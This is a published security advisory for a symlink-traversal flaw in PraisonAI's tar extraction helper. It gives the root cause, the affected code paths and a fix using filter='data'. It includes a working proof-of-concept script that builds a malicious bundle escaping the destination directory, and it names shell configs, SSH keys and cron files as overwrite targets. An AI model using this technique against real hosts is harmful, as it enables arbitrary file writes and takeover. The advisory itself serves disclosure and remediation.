GHSA-9q28-ghcr-c4x3
Suggest an improvement- Source
- https://github.com/advisories/GHSA-9q28-ghcr-c4x3
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-9q28-ghcr-c4x3/GHSA-9q28-ghcr-c4x3.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-9q28-ghcr-c4x3
- Aliases
-
- CVE-2026-44340
- Published
- 2026-05-11T13:59:41Z
- Modified
- 2026-05-11T14:17:53.640560Z
- Severity
-
- 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVSS Calculator
- 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- PraisonAI's symlink-extraction bypass of `_safe_extractall` writes outside `dest_dir`
- Details
-
Summary
The
_safe_extractallhelper that allrecipe pull,recipe publish, andrecipe unpackflows route through validates each archive member'snamefor absolute paths,..segments, and resolved-path escape — but does not validatemember.linkname, does not reject symlink/hardlink members, and callstar.extractall(dest_dir)withoutfilter="data". A bundle that contains a symlink with a name insidedest_dirbut alinknamepointing outside it, followed by a regular file whose path traverses through the just-created symlink, escapesdest_dirand lets the attacker write arbitrary content to an attacker-chosen location on the victim's filesystem.Affected paths
Every code path that calls
_safe_extractallis exposed:| Caller | File:line | |---|---| |
praisonai recipe unpack|src/praisonai/praisonai/cli/features/recipe.py:1175(introduced as the fix for GHSA-99g3-w8gr-x37c) | |LocalRegistry.unpack(recipe pull) |src/praisonai/praisonai/recipe/registry.py:413| | Registry archive validation (publish) |src/praisonai/praisonai/recipe/registry.py:808|Root cause
recipe/registry.py:131-178:def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None: ... for member in tar.getmembers(): ... member_path = Path(member.name) if member_path.is_absolute(): raise RegistryError(...) if '..' in member_path.parts: raise RegistryError(...) resolved = (dest_resolved / member_path).resolve() if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved: raise RegistryError(...) # All members validated — safe to extract tar.extractall(dest_dir)Three gaps:
- The loop checks only
member.name.member.linkname(the symlink / hardlink target) is not inspected. member.issym()andmember.islnk()are not used to refuse link members at all.tar.extractall(dest_dir)runs withoutfilter="data". On Python ≤ 3.13 the default isfully_trusted(with a DeprecationWarning on 3.12+), which permits symlinks pointing outsidedest_dir.
When the archive is extracted in member order, the symlink lands first, and any subsequent member whose path traverses through that symlink follows it to the attacker's chosen location.
Reproduction
Tested in a disposable container against
praisonai==4.6.35(pip install praisonai, no other modifications).make_bundle.py:import io, json, tarfile manifest = json.dumps({"name": "legit", "version": "1.0.0"}).encode() with tarfile.open("malicious.praison", "w:gz") as tar: info = tarfile.TarInfo("manifest.json"); info.size = len(manifest) tar.addfile(info, io.BytesIO(manifest)) sym = tarfile.TarInfo("legit/escape") sym.type = tarfile.SYMTYPE sym.linkname = "/tmp/PWNED" tar.addfile(sym) payload = b"PWNED via symlink-extraction bypass of _safe_extractall\n" pf = tarfile.TarInfo("legit/escape/owned.txt"); pf.size = len(payload) tar.addfile(pf, io.BytesIO(payload))direct_test.py:import shutil, tarfile from pathlib import Path from praisonai.recipe.registry import _safe_extractall DEST = Path("/work/recipes_direct") shutil.rmtree(DEST, ignore_errors=True); DEST.mkdir(parents=True) Path("/tmp/PWNED").mkdir(parents=True, exist_ok=True) with tarfile.open("malicious.praison", "r:gz") as tar: _safe_extractall(tar, DEST) assert Path("/tmp/PWNED/owned.txt").exists(), "did not escape" print("PWNED:", Path("/tmp/PWNED/owned.txt").read_text())Run:
docker run --rm -v "$PWD:/work" -w /work python:3.11-slim sh -c ' pip install -q praisonai && python make_bundle.py && python direct_test.py 'Observed output:
_safe_extractall returned cleanly PWNED: PWNED via symlink-extraction bypass of _safe_extractall/tmp/PWNED/owned.txtexists after the call returns, written outside the destination directory the helper was asked to extract into.Impact
Arbitrary file write with attacker-controlled content to an attacker-chosen path, on every host that processes a malicious
.praisonbundle through any of the three callers above.Realistic exploitation paths:
- A user runs
praisonai recipe unpack ./<malicious>.praisonafter obtaining the bundle from a shared registry, a tutorial link, or direct messaging. - A user runs
praisonai recipe pull <name>against a malicious or compromised registry. - A registry server processes an uploaded
.praisonbundle (the publish path is reachable over the network if the server is exposed. per GHSA-r9x3-wx45-2v7f and GHSA-2xgv-5cv2-47vv).
Where the agent process runs as a regular user, the attacker can overwrite shell config (
.bashrc,.zshrc,.profile), SSHauthorized_keys, cron entries, or project files in adjacent directories. Where the process runs as root (registry-server deployments and somesudo-launched workflows), the attacker controls arbitrary system files.This re-opens the
recipe pull,recipe publish, andrecipe unpackpaths that GHSA-99g3-w8gr-x37c, GHSA-4rx4-4r3x-6534, GHSA-r9x3-wx45-2v7f, and GHSA-4ph2-f6pf-79wv were each intended to close.Suggested remediation
Single-line fix at
recipe/registry.py:178:tar.extractall(dest_dir, filter="data")filter="data"(introduced in Python 3.12; available as a backport on 3.8+ via the official PEP 706 reference implementation) refuses symlinks, hardlinks, device nodes, and absolute or escaping link targets, it is the canonical Python defense against this class. If you also support older Python, add an explicit guard inside the existing per-member loop beforetar.extractall:if member.issym() or member.islnk(): link_target = (dest_resolved / member_path.parent / member.linkname).resolve() if member.linkname.startswith("/") or not str(link_target).startswith(str(dest_resolved) + os.sep): raise RegistryError( f"Refusing to extract link with target outside dest dir: " f"{member.name} -> {member.linkname}" )Affected versions
praisonai >= 2.7.2through current4.6.35(the helper exists at least back to the earliest path-traversal patch chain referenced in GHSA-99g3-w8gr-x37c). All releases that route extraction through_safe_extractallare exposed.Disclosure
Reported privately via the project's GHSA workflow at https://github.com/MervinPraison/PraisonAI/security/advisories/new
-- Dhiral Vyas
- The loop checks only
- Database specific
{ "github_reviewed": true, "severity": "HIGH", "nvd_published_at": "2026-05-08T14:16:47Z", "cwe_ids": [ "CWE-22", "CWE-59" ], "github_reviewed_at": "2026-05-11T13:59:41Z" }- References
Affected packages
PyPI / praisonai
Package
- Name
- praisonai
- View open source insights on deps.dev
- Purl
- pkg:pypi/praisonai
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed4.6.37